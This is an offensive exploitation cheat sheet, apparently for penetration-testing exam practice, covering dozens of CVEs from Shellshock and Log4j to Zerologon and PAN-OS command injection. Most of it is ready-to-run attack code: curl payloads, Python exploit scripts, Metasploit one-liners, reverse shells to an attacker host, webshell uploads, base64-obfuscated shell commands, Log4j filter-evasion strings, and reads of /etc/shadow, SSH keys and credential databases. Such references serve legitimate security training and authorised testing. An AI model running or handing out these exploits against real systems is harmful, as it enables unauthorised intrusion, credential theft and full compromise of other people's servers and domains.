- 2024-2025 Critical CVEs
- Bash
- MySQL
- PostgreSQL
- Redis
- SSH
- SMB
- FTP
- Exim
- Nexus
- Log4j
- Tomcat
- Drupal
- PHPMailer
- Webmin
- Jenkins
- Supervisord
- SaltStack
- Ruby (Net::FTP)
- ImageMagick
- Grafana
- Apache
- Apache Commons Text
- Aerospike
- Linux Kernel
- FreeSWITCH
- WiFi Mouse
- Mobile Mouse
- Usermin
- Vesta Control Panel
- JDWP
- Windows/Active Directory
- Microsoft Exchange
- Spring Framework
- Microsoft Office
High-Priority vulnerabilities from 2024-2025 actively exploited in the wild
OpenSSH RCE via race condition in signal handler - Affected: OpenSSH 8.5p1 - 9.7p1 (glibc-based Linux)
# Check version
ssh -V
nmap -sV -p 22 $rhost | grep OpenSSH
# Vulnerable versions: 8.5p1 <= OpenSSH < 9.8p1 (a distro build of 9.7p1 with the fix backported is not affected; a banner match alone can be a false positive, confirm against the package changelog)
# Not exploitable on OpenBSD, only glibc-based Linux
# Detection (banner check)
nc -vn $rhost 22 | head -1
# Note: Exploitation requires many connection attempts (hours to days)
# Mitigation: Update to OpenSSH 9.8p1+ or set LoginGraceTime to 0 (LoginGraceTime 0 disables the unauthenticated-session timeout and leaves sshd exposed to connection-exhaustion denial of service; prefer patching)
Command Injection in GlobalProtect - Affected: PAN-OS 10.2, 11.0, 11.1
# Detection - Check for GlobalProtect
curl -sk "https://$rhost/global-protect/portal/css/login.css"
# Exploitation (Command Injection via Cookie)
curl -sk "https://$rhost/ssl-vpn/hipreport.esp" \
-H "Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/test\`id\`"
# Read command output
curl -sk "https://$rhost/ssl-vpn/hipreport.esp" \
-H "Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/test"
# Metasploit
msfconsole -q -x "use exploit/linux/http/panos_telemetry_cmd_exec; set RHOSTS $rhost; exploit"
Out-of-bounds write in sslvpnd - Affected: FortiOS 6.0-7.4.2
# Detection - Check SSL VPN endpoint
curl -sk "https://$rhost/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
# Note: Exploitation is complex, requires heap manipulation
# POC: https://github.com/BishopFox/cve-2024-21762-check
# Check vulnerability
python3 cve-2024-21762-check.py -t $rhost
Authentication bypass to RCE - Affected: TeamCity < 2023.11.4
# Detection
curl -sk "https://$rhost:8111/app/rest/debug/processes"
# Create admin user (Auth Bypass)
curl -sk "https://$rhost:8111/app/rest/users" \
-X POST -H "Content-Type: application/json" \
-d '{"username": "hacker", "password": "hacker", "email": "hacker@evil.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}'
# Metasploit
msfconsole -q -x "use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198; set RHOSTS $rhost; exploit"
Path traversal to auth bypass - Affected: ScreenConnect < 23.9.8
# Detection
curl -sk "https://$rhost/SetupWizard.aspx" | grep -i "screenconnect"
# Exploitation - Setup wizard access bypass
curl -sk "https://$rhost/SetupWizard.aspx/../../SetupWizard.aspx"
# Create admin account via setup wizard (if accessible)
# Then upload malicious extension for RCE
# Metasploit
msfconsole -q -x "use exploit/windows/http/connectwise_screenconnect_auth_bypass; set RHOSTS $rhost; exploit"
CUPS IPP attribute injection leads to RCE - Affected: cups-browsed < 2.0.1
# Detection - Check if CUPS is exposed
nmap -sU -p 631 $rhost
lpstat -h $rhost -l
# Check cups-browsed status
systemctl status cups-browsed
# Exploitation requires:
# 1. cups-browsed listening on UDP 631
# 2. Attacker-controlled printer advertisement
# 3. User prints to malicious printer
# POC: https://github.com/OpenPrinting/cups-browsed/security/advisories
Server-Side Template Injection - Affected: Confluence 8.0.x - 8.5.3
# Detection
curl -sk "https://$rhost/template/aui/text-inline.vm" | grep -i confluence
# SSTI exploitation
curl -sk "https://$rhost/template/aui/text-inline.vm" \
-X POST -H "Content-Type: application/x-www-form-urlencoded" \
-d "label=\u0027%2b#request[\u0027.KEY_velocity.struts2.context\u0027].internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027X-Cmd-Response\u0027,@java.lang.Runtime@getRuntime().exec(\u0027id\u0027))"
# Metasploit
msfconsole -q -x "use exploit/multi/http/atlassian_confluence_rce_cve_2023_22527; set RHOSTS $rhost; exploit"
# Quick CVE detection with nmap
nmap -Pn -sV --script "vuln,exploit" $rhost 2>/dev/null | grep -E "CVE-|VULNERABLE"
Bash RCE via CGI scripts - Affected: Bash < 4.3
# Scan port + banner
nmap -sV -p 80,443,8080 $rhost
# Check for CGI with Nikto
nikto -h http://$rhost:$rport
# Test vulnerability via User-Agent
curl -H "User-Agent: () { :;}; echo; echo vulnerable" \
"http://$rhost:$rport/cgi-bin/stats"
# RCE: Read /etc/passwd
curl -H "User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'" \
"http://$rhost:$rport/cgi-bin/stats"
# List files
curl -H "User-Agent: () { :;}; /bin/ls -la /var/www/html/" \
"http://$rhost:$rport/cgi-bin/stats"
# Reverse shell
curl -H "User-Agent: () { :;}; /bin/bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'" \
"http://$rhost:$rport/cgi-bin/stats"
MySQL/MariaDB Authentication Bypass - Race Condition
#!/usr/bin/env python3
import subprocess
TARGET = "TARGET_IP" # Replace with target
PORT = "3306"
USER = "root"
DB = "mysql"
WRONG_PASS = "wrongpassword"
QUERY = "SELECT LOAD_FILE('/etc/passwd')"
print(f"[*] Trying to bypass login on {TARGET}:{PORT} (max 300 attempts)...")
for i in range(1, 301):
cmd = [
"mysql",
f"--host={TARGET}",
f"--port={PORT}",
f"-u{USER}",
f"--password={WRONG_PASS}",
"--skip-ssl",
DB,
"-e", QUERY
]
result = subprocess.run(cmd, capture_output=True, text=True)
if "Access denied" not in result.stderr:
print(f"[+] SUCCESS on attempt {i}!")
print(result.stdout.strip())
break
elif i % 50 == 0:
print(f" → {i} attempts... still trying")
PostgreSQL COPY FROM PROGRAM RCE - Requires DB access
# Connect to PostgreSQL
psql -U postgres -h $rhost
# Create table for command output
CREATE TABLE cmd_exec(cmd_output text);
# Execute command
COPY cmd_exec FROM PROGRAM 'id';
# View output
SELECT * FROM cmd_exec;
# Read sensitive files
COPY cmd_exec FROM PROGRAM 'cat /etc/passwd';
SELECT * FROM cmd_exec;
# Reverse shell
COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/$lhost/$lport 0>&1"';
Redis Lua Sandbox Escape - Affected: Ubuntu/Debian packages
# Check version + OS
redis-cli -h $rhost -p 6379 info server | grep -E "redis_version|os"
# Check Lua module
redis-cli -h $rhost -p 6379 EVAL "return require('bit')" 0
# RCE via Lua
redis-cli -h $rhost -p 6379 EVAL '
local bit = require("bit")
return os.execute("whoami")
' 0
# Read file
redis-cli -h $rhost -p 6379 EVAL '
local bit = require("bit")
return os.execute("cat /etc/passwd")
' 0
git clone https://github.com/aodsec/CVE-2022-0543.git
cd CVE-2022-0543
python3 -m venv venv && source venv/bin/activate
pip install redis bitstring
python3 CVE-2022-0543.py
# → Enter IP, Port, cmd
LibSSH Authentication Bypass - Affected: < 0.7.6, < 0.8.4
# Clone exploit
git clone https://github.com/SilasSpringer/CVE-2018-10933.git
# Run exploit
python exploit.py $rhost
OpenSSH Username Enumeration - Affected: < 7.7
# Download exploit
wget "https://raw.githubusercontent.com/Rhynorater/CVE-2018-15473-Exploit/master/sshUsernameEnumExploit.py"
# Install dependency
pip install paramiko==2.4.0
# Enumerate usernames
python sshUsernameEnumExploit.py --userList /usr/share/wordlists/rockyou.txt $rhost
# Bruteforce found users
hydra -l $user -P /usr/share/wordlists/rockyou.txt ssh://$rhost -s 22 -vV
Samba RCE via Writable Share - Affected: 3.5.0 - 4.6.4
# Metasploit
msfconsole -q -x "use exploit/linux/samba/is_known_pipename; set RHOSTS $rhost; set RPORT 445; exploit"
ProFTPD mod_copy Remote Command Execution - Affected: ProFTPD 1.3.5
# Connect to FTP
nc $rhost 21
# Copy command line to create PHP shell
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/backdoor.php
# Alternative: Create webshell directly
# Step 1: Connect and copy /etc/passwd to test
site cpfr /etc/passwd
site cpto /var/www/html/test.txt
# Step 2: Copy PHP webshell to web root
site cpfr /proc/self/cmdline
site cpto /var/www/html/backdoor.php
# Metasploit alternative
msfconsole -q -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS $rhost; set SITEPATH /var/www/html; exploit"
Exim Mail Server Local Privilege Escalation - Affected: 4.87 - 4.91
# Download exploit
wget https://raw.githubusercontent.com/offensive-security/exploitdb/master/exploits/linux/local/46996.sh -O raptor_exim_wiz
# Make executable
chmod +x raptor_exim_wiz
# Method 1: Setuid (creates SUID binary)
./raptor_exim_wiz -m setuid
# Creates /tmp/pwned with root SUID
/tmp/pwned
# Method 2: Netcat (opens shell on port 31337)
./raptor_exim_wiz -m netcat
nc 127.0.0.1 31337
Nexus Repository Manager 2.x RCE - Authenticated
# Clone exploit
git clone https://github.com/jaychoubaby/CVE-2019-5475-Nexus-Repository-Manager-
# Usage (requires valid credentials)
python3 exploit.py -u admin -p admin123 -t http://$rhost:8081 -c "id"
Apache Log4j JNDI Injection RCE - Affected: 2.0-beta9 - 2.14.1
# Test for vulnerability
curl -H "X-Api-Version: \${jndi:ldap://$lhost:1389/a}" http://$rhost
# Common injection points
User-Agent: ${jndi:ldap://$lhost/a}
X-Forwarded-For: ${jndi:ldap://$lhost/a}
Cookie: ${jndi:ldap://$lhost/a}
Referer: ${jndi:ldap://$lhost/a}
# Clone JNDI-Injection-Exploit
git clone https://github.com/welk1n/JNDI-Injection-Exploit
cd JNDI-Injection-Exploit
mvn clean package -DskipTests
# Start malicious LDAP/RMI server
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A $lhost
# Trigger with payload
curl -H "X-Api-Version: \${jndi:ldap://$lhost:1389/Basic/Command/Base64/...}" http://$rhost
# Case variation
${jNdI:ldap://$lhost/a}
${${lower:j}ndi:ldap://$lhost/a}
${${upper:j}ndi:ldap://$lhost/a}
# Nested lookup
${${::-j}${::-n}${::-d}${::-i}:ldap://$lhost/a}
# Environment variable
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//$lhost/a}
Tomcat PUT Method JSP Upload - Affected: 7.0.0 - 7.0.79
# Check version
curl -I http://$rhost:8080/
# Check PUT method
echo "test" > test.txt
curl -v -X PUT --data-binary @test.txt "http://$rhost:8080/test.txt"
# Create JSP webshell
cat > shell.jsp << 'EOF'
<%@ page import="java.util.*,java.io.*"%>
<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
DataInputStream dis = new DataInputStream(p.getInputStream());
String disr = dis.readLine();
while ( disr != null ) { out.println(disr); disr = dis.readLine(); } %>
EOF
# Upload with PUT bypass (use / or ;)
curl -X PUT --data-binary @shell.jsp "http://$rhost:8080/shell.jsp/"
# Test RCE
curl "http://$rhost:8080/shell.jsp?cmd=whoami"
curl "http://$rhost:8080/shell.jsp?cmd=cat%20/etc/passwd"
Tomcat AJP LFI - Affected: < 9.0.31, < 8.5.51, < 7.0.100
# Clone exploit
git clone https://github.com/hypn0s/AJPy
# Read WEB-INF/web.xml (credentials)
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml $rhost
# Default credentials often found
# tomcat:s3cret
Drupal RCE via Form API - Affected: 7.x, 8.x
# Metasploit
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOSTS $rhost; set RPORT 80; exploit"
# Manual (using ruby script)
# https://github.com/dreadlocked/Drupalgeddon2
ruby drupalgeddon2.rb http://$rhost/
# Enumerate WordPress
wpscan --url http://$rhost --enumerate ap,at,u
# Aggressive plugin detection
wpscan --url http://$rhost --enumerate p --plugins-detection aggressive
WordPress Mail Masta Plugin Local File Inclusion - Commonly seen in OSCP
# Check if plugin exists
curl -s "http://$rhost/wp-content/plugins/mail-masta/" | grep -i "index"
# LFI via count_of_send.php
curl "http://$rhost/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
# LFI via csvexport.php
curl "http://$rhost/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
# Windows - read win.ini
curl "http://$rhost/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=c:/windows/win.ini"
# Base64 encode source code
curl "http://$rhost/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=/var/www/html/wp-config.php"
# Decode
echo "BASE64_OUTPUT" | base64 -d
# Check version
curl -s "http://$rhost/wp-content/plugins/wp-file-manager/readme.txt" | grep -i "stable tag"
# Upload webshell
curl -k "http://$rhost/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" -F "upload[]=@shell.php" -F "cmd=upload" -F "target=l1_Lw"
# Access shell
curl "http://$rhost/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=id"
# Host payload file on attacker machine with content:
# <pre>system($_GET['cmd'])</pre>
# Trigger RCE
curl "http://$rhost/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://$lhost/payload.txt"
# Execute command
curl "http://$rhost/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://$lhost/payload.txt&cmd=id"
GlassFish 4.1 Directory Traversal - Read arbitrary files
nmap -sV -p 4848,8080 $rhost
curl -s "http://$rhost:4848/" | grep -i "glassfish"
# Read win.ini (Windows)
curl "http://$rhost:4848/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"
# Read /etc/passwd (Linux)
curl "http://$rhost:4848/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd"
# Read SynaMan config (example from OSCP)
curl "http://$rhost:4848/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afsynaman/config/AppConfig.xml"
# If admin console is accessible (default: no password)
# Generate WAR payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f war -o shell.war
# Deploy via admin console: http://$rhost:4848/
# Applications > Deploy > Upload WAR file
# Trigger shell
curl "http://$rhost:8080/shell/"
PHPMailer Command Injection - Affected: < 5.2.18
# Send malicious POST request
curl -X POST http://$rhost/ \
-d 'action=submit' \
-d 'name=<?php system($_GET["cmd"]); ?>' \
-d 'email="attacker\" -oQ/tmp/ -X/var/www/html/shell.php some"@evil.com' \
-d 'message=test'
# Test RCE
curl "http://$rhost/shell.php?cmd=whoami"
curl "http://$rhost/shell.php?cmd=cat%20/etc/passwd"
Webmin Backdoor RCE - Affected: 1.890 - 1.920
# Metasploit
msfconsole -q -x "use exploit/linux/http/webmin_backdoor; set RHOSTS $rhost; set RPORT 10000; set SSL true; set PAYLOAD cmd/unix/bind_perl; exploit"
# Or use exploit/unix/webapp/webmin_backdoor
Jenkins CLI Arbitrary File Read - Affected: < 2.442, < LTS 2.426.3
# Install Java 11
apt install openjdk-11-jre
# Download Jenkins CLI
wget "http://$rhost:8080/jnlpJars/jenkins-cli.jar"
# Read files (various commands)
java -jar jenkins-cli.jar -s http://$rhost:8080/ -http help "@/etc/passwd"
java -jar jenkins-cli.jar -s http://$rhost:8080/ -http who-am-i "@/etc/passwd"
java -jar jenkins-cli.jar -s http://$rhost:8080/ -http version "@/proc/self/environ"
# With authentication
java -jar jenkins-cli.jar -s http://$rhost:8080/ -http -auth "admin:password" connect-node "@/etc/passwd"
Supervisord XML-RPC RCE - Affected: < 3.3.3
# Check if vulnerable
nmap -sV -p 9001 $rhost
#!/usr/bin/env python3
import xmlrpc.client
import sys
target = sys.argv[1] # http://target:9001/RPC2
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0,0)
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')(
'{} | tee -a {}'.format(command, logfile)
)
result = getattr(proxy, 'supervisor.readLog')(0,0)
print(result[len(old):])
# Usage
python3 exploit.py "http://$rhost:9001/RPC2" "id"
python3 exploit.py "http://$rhost:9001/RPC2" "cat /etc/passwd"
SaltStack Authentication Bypass + RCE - Affected: < 3000.2
# Clone exploit
git clone https://github.com/dozernz/cve-2020-11651
# Execute command
python CVE-2020-11651.py $rhost master "id"
# Bind shell
python CVE-2020-11651.py $rhost master "nc -lvp 4444 -e /bin/bash"
# Connect
nc $rhost 4444
Ruby Net::FTP Command Injection - Affected: < 2.4.3, < 2.3.6
# Create venv and run FTP server
python3 -m venv ftpvenv
source ftpvenv/bin/activate
pip install pyftpdlib
echo "test" > dummy.txt
python3 -m pyftpdlib -p 2121 -i 0.0.0.0
# Base64 encode reverse shell
echo -n 'nc -e /bin/bash $lhost 4444' | base64
# Payload (via Burp)
# GET /download?uri=ftp://$lhost:2121/dummy.txt&file=|bash${IFS}-c${IFS}'{echo,BASE64_PAYLOAD}|{base64,-d}|{bash,-i}'
ImageMagick Command Injection via Filename
POST /upload.php HTTP/1.1
Host: $rhost
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="Upload"; filename="|en\"`echo BASE64_REVSHELL | base64 -d | bash`\".png"
Content-Type: image/jpeg
dummy
------Boundary--
# Generate payload
echo -n 'bash -i >& /dev/tcp/$lhost/$lport 0>&1' | base64
# Use output in filename
| CVE | Service | Type | Port |
|---|---|---|---|
| CVE-2014-6271 | Bash/CGI | RCE | 80/443 |
| CVE-2012-2122 | MySQL | Auth Bypass | 3306 |
| CVE-2019-9193 | PostgreSQL | RCE | 5432 |
| CVE-2022-0543 | Redis | RCE | 6379 |
| CVE-2018-10933 | LibSSH | Auth Bypass | 22 |
| CVE-2017-7494 | Samba | RCE | 445 |
| CVE-2017-12615 | Tomcat | RCE | 8080 |
| CVE-2020-1938 | Tomcat AJP | LFI | 8009 |
| CVE-2018-7600 | Drupal | RCE | 80 |
| CVE-2016-10033 | PHPMailer | RCE | 80 |
| CVE-2019-15107 | Webmin | RCE | 10000 |
| CVE-2024-23897 | Jenkins | File Read | 8080 |
| CVE-2017-11610 | Supervisord | RCE | 9001 |
| CVE-2020-11651 | SaltStack | RCE | 4506 |
| CVE-2021-43798 | Grafana | Directory Traversal | 3000 |
| CVE-2021-41773 | Apache | Path Traversal | 80/443 |
| CVE-2022-0847 | Linux Kernel | Privilege Escalation | - |
| CVE-2020-13151 | Aerospike | RCE | 3000 |
| CVE-2022-42889 | Apache Commons Text | RCE | 80/8080 |
| EDB-47799 | FreeSWITCH | RCE | 8021 |
| EDB-50972 | WiFi Mouse | RCE | 1978 |
| EDB-50234 | Usermin | RCE | 20000 |
| - | Mobile Mouse | RCE | 9099 |
| - | Vesta Control Panel | RCE | 8083 |
| EDB-41154 | GNU Screen 4.5.0 | Priv Esc | - |
| - | JDWP | RCE | 5000/8000 |
Grafana Directory Traversal - Affected: 8.0.0-beta1 to 8.3.0
# Check version
curl -s http://$rhost:3000/login | grep -oP 'Grafana v[\d.]+'
# Read /etc/passwd
curl --path-as-is "http://$rhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
# Read Grafana config (contains database credentials)
curl --path-as-is "http://$rhost:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini"
# Read Grafana database
curl --path-as-is "http://$rhost:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db" -o grafana.db
# Extract credentials from database
sqlite3 grafana.db "SELECT login,password,salt FROM user;"
# Try different plugins if alertlist doesn't work
for plugin in alertlist annolist barchart bargauge candlestick canvas cloudwatch dashlist debug elasticsearch gauge geomap gettingstarted grafana graph graphite heatmap histogram influxdb jaeger logs loki mixed mssql mysql news nodeGraph opentsdb piechart pluginlist postgres prometheus stackdriver stat state-timeline status-history table tempo testdata text timeseries traces trend xychart zipkin; do
curl -s --path-as-is "http://$rhost:3000/public/plugins/$plugin/../../../../../../../../etc/passwd" && echo "Plugin: $plugin works!" && break
done
Apache Path Traversal RCE - Affected: 2.4.49, 2.4.50
# Check version
curl -I http://$rhost/
# Verify vulnerability
curl -s --path-as-is "http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
# Read files
curl -s --path-as-is "http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
curl -s --path-as-is "http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
# RCE (if mod_cgi is enabled)
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" \
"http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
# Reverse shell
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/$lhost/$lport 0>&1" \
"http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
curl -s --path-as-is -d "echo Content-Type: text/plain; echo;" \
"http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/home/$user/.ssh/id_rsa"
Apache Commons Text RCE - Affected: < 1.10.0
# Check if target uses Apache Commons Text
# Usually found in Java applications
curl -s "http://$rhost:8080/Changelog" | grep -i "commons"
#!/usr/bin/env python3
# Text4Shell RCE Exploit
import urllib.parse
import http.client
import sys
target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]
raw_payload = (
f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
f"['bash','-c','bash -c \\'exec bash -i >& "
f"/dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)
encoded_payload = urllib.parse.quote(raw_payload)
path = f"/search?query={encoded_payload}" # Modify parameter for target
print(f"[+] Target: http://{target_ip}:8080{path}")
conn = http.client.HTTPConnection(target_ip, 8080)
conn.request("GET", path, body="", headers={
"Host": target_ip,
"Content-Type": "application/json"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
conn.close()
# Usage
nc -lvnp 4444
python3 text4shell.py $rhost $lhost 4444
Aerospike Database RCE - Affected: < 5.1.0.3
# Check for Aerospike service
curl -s "http://$rhost/api/heartbeat" | grep -i aerospike
# Clone exploit
git clone https://github.com/b4ny4n/CVE-2020-13151.git
cd CVE-2020-13151
# Install requirements
pip install aerospike --break-system-packages
# Start listener
nc -lvnp 80
# Execute exploit
python cve2020-13151.py --ahost $rhost --pythonshell --lhost=$lhost --lport=80
Linux Kernel Arbitrary File Overwrite - Affected: 5.8 <= kernel < 5.16.11
uname -r
# Vulnerable if: 5.8 <= version < 5.16.11
# Clone exploit
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
# Compile (on attacker or target)
gcc -static -o exploit-2 exploit-2.c
# Transfer to target
python -m http.server 80
wget http://$lhost/exploit-2
chmod +x exploit-2
# Find SUID binary
find / -perm -4000 2>/dev/null
# Exploit SUID binary
./exploit-2 /usr/bin/passwd # or another SUID binary
# Get root shell
whoami
Linux Kernel Race Condition - Affected: 2.6.22 <= kernel < 4.8.3
uname -r
# Vulnerable if: 2.6.22 <= version < 4.8.3
# Method 1: SUID binary modification
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -pthread dirtyc0w.c -o dirtyc0w -lcrypt
./dirtyc0w /etc/passwd "root::0:0:root:/root:/bin/bash"
su root
# Method 2: Cowroot (spawn root shell)
wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c
gcc -pthread cowroot.c -o cowroot -lcrypt
./cowroot
# Method 3: Firefart (creates new root user)
wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
# Creates user "firefart" with root privileges
su firefart
GNU Screen 4.5.0 Local Privilege Escalation
# Clone XenSpawn
git clone https://github.com/X0RW3LL/XenSpawn.git
cd XenSpawn/
chmod +x spawn.sh
sudo ./spawn.sh test
# Enter container
sudo systemd-nspawn -M test
# Clone exploit in container
git clone https://github.com/YasserREED/screen-v4.5.0-priv-escalate.git
cd screen-v4.5.0-priv-escalate
chmod +x exploit.sh
bash exploit.sh
# Copy compiled files
cp libhax.so /root
cp rootshell /root
exit
# Copy from container to host
sudo cp /var/lib/machines/test/root/libhax.so .
sudo cp /var/lib/machines/test/root/rootshell .
# On target
cd /tmp
wget http://$lhost/libhax.so
wget http://$lhost/rootshell
wget http://$lhost/41154.sh
chmod +x 41154.sh
sed -i 's/\r$//' 41154.sh # Fix line endings
bash 41154.sh
whoami # Should be root
FreeSWITCH Event Socket Command Execution - Port 8021
#!/usr/bin/env python3
# FreeSWITCH 1.10.1 - Command Execution
import socket
import sys
host = sys.argv[1]
command = sys.argv[2]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 8021))
s.recv(1024)
s.send(b"auth ClueCon\n\n") # Default password
s.recv(1024)
s.send(f"api system {command}\n\n".encode())
response = s.recv(8096)
print(response.decode())
s.close()
# Usage - Reverse shell
nc -lvnp 80
python3 47799.py $rhost 'powershell -e <BASE64_PAYLOAD>'
WiFi Mouse 1.7.8.5 Remote Code Execution - Port 1978
# Download exploit
searchsploit -m 50972
sed -i 's/\xE2\x80\x8B//g' 50972.py # Fix unicode issues
# Generate payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$lhost LPORT=443 -f exe -o met.exe
# Start handler
msfconsole -q -x 'use multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST $lhost; set LPORT 443; run'
# Host payload
python -m http.server 80
# Execute exploit
python 50972.py $rhost $lhost met.exe
Mobile Mouse 3.6.0.4 Remote Code Execution - Port 9099
# Clone exploit
git clone https://github.com/KryoCeph/Mobile-Mouse-3.6.0.4-Exploit.git
cd Mobile-Mouse-3.6.0.4-Exploit
# Generate payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$lhost LPORT=443 -f exe -o met.exe
# Start handler
msfconsole -q -x 'use multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST $lhost; set LPORT 443; run'
# Host payload
python -m http.server 8080
# Upload and execute
python 1-MMUpload.py --target $rhost --lhost $lhost --file met.exe
python 2-MMExecute.py --target $rhost --file met.exe
Usermin 1.820 RCE (Authenticated) - Port 20000
#!/usr/bin/env python3
# Usermin 1.820 - RCE via GnuPG
import requests
import urllib.parse
import re
import sys
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
listen_ip = sys.argv[4]
listen_port = sys.argv[5]
target_url = f"https://{target}:20000"
session = requests.Session()
# Login
headers = {'Cookie': 'redirect=1; testing=1;', 'Referer': target_url}
session.post(f"{target_url}/session_login.cgi", headers=headers, verify=False,
data={"user": username, "pass": password})
# Exploit via GnuPG
payload = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {listen_ip} {listen_port} >/tmp/f;"
post_data = {
"name": f'";{payload}echo "',
"email": "exploit@test.com"
}
session.headers.update({'referer': target_url})
session.post(f"{target_url}/gnupg/secret.cgi", verify=False, data=post_data)
# Trigger exploit
key_list = session.post(f"{target_url}/gnupg/list_keys.cgi", verify=False)
last_key = re.findall(r"edit_key.cgi\?(.*?)'", str(key_list.content))[-2]
session.post(f"{target_url}/gnupg/edit_key.cgi?{last_key}", verify=False, timeout=3)
# Usage
nc -lvnp 4444
python3 usermin_exploit.py $rhost $username $password $lhost 4444
Vesta Control Panel RCE (Authenticated) - Port 8083
# Clone exploit
git clone https://github.com/CSpanias/vesta-rce-exploit.git
cd vesta-rce-exploit
# Execute
python3 vesta-rce-exploit.py https://$rhost:8083 $username $password
Java Debug Wire Protocol RCE - Usually on Port 5000/8000
# Use pspy to detect JDWP
./pspy64
# Look for: java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:8000
# Clone JDWP Shellifier
git clone https://github.com/IOActive/jdwp-shellifier
cd jdwp-shellifier
# If JDWP is on localhost, forward the port
ssh -N -R 127.0.0.1:9000:127.0.0.1:8000 kali@$lhost
# Execute command (use forwarded port 9000)
python2 jdwp-shellifier.py -t 127.0.0.1 -p 9000 --cmd "chmod u+s /bin/bash"
# Trigger (connect to another port if needed)
nc 127.0.0.1 5000
# Get root
/bin/bash -p
Netlogon Elevation of Privilege - Reset DC machine account password without authentication
# Scan for vulnerability
nxc smb $rhost -u '' -p '' -M zerologon
# Clone and exploit
git clone https://github.com/dirkjanm/CVE-2020-1472 && cd CVE-2020-1472 && python3 cve-2020-1472-exploit.py DC01 $rhost
# Dump hashes with empty password
impacket-secretsdump -no-pass -just-dc $domain/'DC01$'@$rhost
# Restore DC password (IMPORTANT!)
python3 restorepassword.py $domain/DC01@DC01 -target-ip $rhost -hexpass <HEX_HASH>
sAMAccountName Spoofing - Impersonate DC and perform DCSync
# Scan for vulnerability
nxc smb $rhost -u '$user' -p '$pass' -M nopac
# Clone and exploit (auto shell)
git clone https://github.com/Ridter/noPac && cd noPac && python3 noPac.py $domain/$user:$pass -dc-ip $rhost -shell
# Just get TGT impersonating DA
python3 noPac.py $domain/$user:$pass -dc-ip $rhost --impersonate administrator -dump
